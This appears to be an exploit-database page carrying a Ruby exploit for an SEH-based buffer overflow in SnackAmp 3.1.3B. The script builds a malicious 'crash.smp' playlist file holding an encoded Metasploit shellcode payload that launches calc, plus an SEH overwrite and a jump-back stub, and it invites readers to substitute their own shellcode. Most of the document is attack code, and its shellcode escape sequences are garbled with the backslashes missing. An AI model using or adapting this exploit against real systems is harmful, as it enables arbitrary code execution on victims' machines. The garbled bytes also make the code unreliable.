SnackAmp 3.1.3B Malicious SMP Buffer Overflow Vulnerability (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SnackAmp 3.1.3B Malicious SMP Buffer Overflow Vulnerability (SEH)
# Published : 2010-09-24
# Author : James Fitts
# Previous Title : Audiotran 1.4.2.4 SEH Overflow Exploit (DEP Bypass)
# Next Title : MOAUB #24 - Microsoft Excel OBJ Record Stack Overflow

# Exploit Title: SnackAmp 3.1.3B Malicious SMP Buffer Overflow Vulnerability (SEH)
# Date: 09/24/10
# Author: james [AT] learnsecurityonline [DOT] com
# Software Link: http://snackamp.sourceforge.net/
# Version: 3.1.3 Beta
# Tested on: Windows XP SP3
# CVE: N/A

# Just like the previous version there is plenty of room for your
# shellcode. Have fun!

#! /usr/bin/env ruby

SEH = [0x014E9D40].pack('V') # pop pop ret from pngtcl10.dll

nSEH = [0x909006eb].pack('V')

padding = "x90" * 5

# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
payload =  "xdbxc0x31xc9xbfx7cx16x70xcc"
payload << "xd9x74x24xf4xb1x1ex58x31x78"
payload << "x18x83xe8xfcx03x78x68xf4x85"
payload << "x30x78xbcx65xc9x78xb6x23xf5"
payload << "xf3xb4xaex7dx02xaax3ax32x1c"
payload << "xbfx62xedx1dx54xd5x66x29x21"
payload << "xe7x96x60xf5x71xcax06x35xf5"
payload << "x14xc7x7cxfbx1bx05x6bxf0x27"
payload << "xddx48xfdx22x38x1bxa2xe8xc3"
payload << "xf7x3bx7axcfx4cx4fx23xd3x53"
payload << "xa4x57xf7xd8x3bx83x8ex83x1f"
payload << "x57x53x64x51xa1x33xcdxf5xc6"
payload << "xf5xc1x7ex98xf5xaaxf1x05xa8"
payload << "x26x99x3dx3bxc0xd9xfex51x61"
payload << "xb6x0ex2fx85x19x87xb7x78x2f"
payload << "x59x90x7bxd7x05x7fxe8x7bxca"

junk = "x41" * (8788 - padding.length - payload.length)

jmp_back = "xe9xa3xddxffxff"

File.open("crash.smp", 'w') do |b|
	b.write padding + payload + junk + nSEH + SEH + jmp_back
end